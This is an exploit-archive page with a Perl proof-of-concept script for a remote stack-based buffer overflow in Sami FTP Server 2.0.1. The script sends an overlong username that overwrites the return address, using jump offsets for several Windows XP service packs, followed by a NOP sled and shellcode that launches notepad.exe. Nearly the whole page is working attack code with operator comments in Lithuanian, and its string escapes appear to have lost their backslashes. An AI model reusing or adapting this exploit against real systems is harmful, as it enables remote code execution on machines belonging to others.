Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC
# Published : 2006-01-25
# Author : Critical Security
# Previous Title : Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)
# Next Title : Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit

#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))

use Net::FTP;                 # <- jo, ae tinginys :)
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------n";
print "Usage : exploit.pl -hVictimsIPAddress -yYourIPAddress -oOffsetNumbern";
print " Offsets: n";
print " 1 - 0x76B43AE0 Windows XP SP2 winmm.dll call espn";
print " 2 - 0x76B5D17B Windows XP SP1 winmm.dll call espn";
print " 3 - 0x71AB7BFB Windows XP SP0 ws2_32.dll jmp espn";
print " 4 - 0x9C2295DF FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp espn";
print " If values not specified, default values will be used.n";
print " Example : ./eploit.pl -h127.0.0.1 -y127.0.0.1 -o1n";
print "--------------------------------------------------------------------n";
}
$host =   "127.0.0.1";        # aukos ip
$yourip = "127.0.0.1" ;       # Reikalingas tam, kad b?t? galima sulyginti eelkodà, nes i steka ásiraeo ir jusu ip adresas, todel áraeykit savo ieorini (jei neturit tokio - gateway ip)
$offset = "xE0x3AxB4x76"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*).(.*).(.*).(.*))/);
$yourip = $1 if ($_=~/-y((.*).(.*).(.*).(.*))/);
$offset = $1 if ($_=~/-o(.*)/);
}
#offset? suradimui naudokit findjmp.exe arba metasploit.com opcod? db ;)  (call esp/jmp esp..)
switch ($offset) {
case 1 { $offset = "xE0x3AxB4x76" } # Windows XP SP2 winmm.dll call esp
case 2 { $offset = "x7BxD1xB5x76" } # Windows XP SP1 winmm.dll call esp
case 3 { $offset = "xFBx7BxABx71" } # Windows XP SP0 ws2_32.dll jmp esp
case 4 { $offset = "xDFx95x22x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
}

foreach $letter (split '', $yourip) { $c++;};
$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
$user = "A" x 213 . # vatiuojam iki returno :O  (cia irgi galima kiet eelkodà :) )
"A" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraeo ir ip adresas, tod?l reikia pagal já paskaièiuot, kur raeyt ret adresà
$offset .           # ret adresas á kokio dll'o call esp  ar jmp esp, ar ka nors panaeaus svarbu, kad nueoktume á esp ;)
"x90" x 25 .       # nop'? sled'as, kad sulygintume su esp esanèiu adresu

# eelkodas paleidtiantis notepadà (eelkodas skirtas tiem kas sak?, jog critical m?gsta DoS :*) - nor?sit, ásid?sit normal?..
"xCDx03".
"xEBx61x56x6Ax30x59x64x8Bx01x8Bx40x0C".
"x8Bx70x1CxADx8Bx40x08x5ExC3x60x8Bx6C".
"x24x24x8Bx45x3Cx8Bx54x05x78x01xEAx8B".
"x4Ax18x8Bx5Ax20x01xEBxE3x34x49x8Bx34".
"x8Bx01xEEx31xFFx31xC0xFCxACx84xC0x74".
"x07xC1xCFx0Dx01xC7xEBxF4x3Bx7Cx24x28".
"x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8B".
"x5Ax1Cx01xEBx8Bx04x8Bx01xE8x89x44x24".
"x1Cx61xC3xE8x9AxFFxFFxFFx68x98xFEx8A".
"x0Ex50xE8xA2xFFxFFxFFxEBx02xEBx05xE8".
"xF9xFFxFFxFFx5Bx83xC3x1Cx33xC9x88x0B".
"x83xEBx0Bx41x51x53xFFxD0x90x6Ex6Fx74".
"x65x70x61x64x2Ex65x78x65x01";
$ftp->login("$user","biatch");

# www.Syue.com [2006-01-25]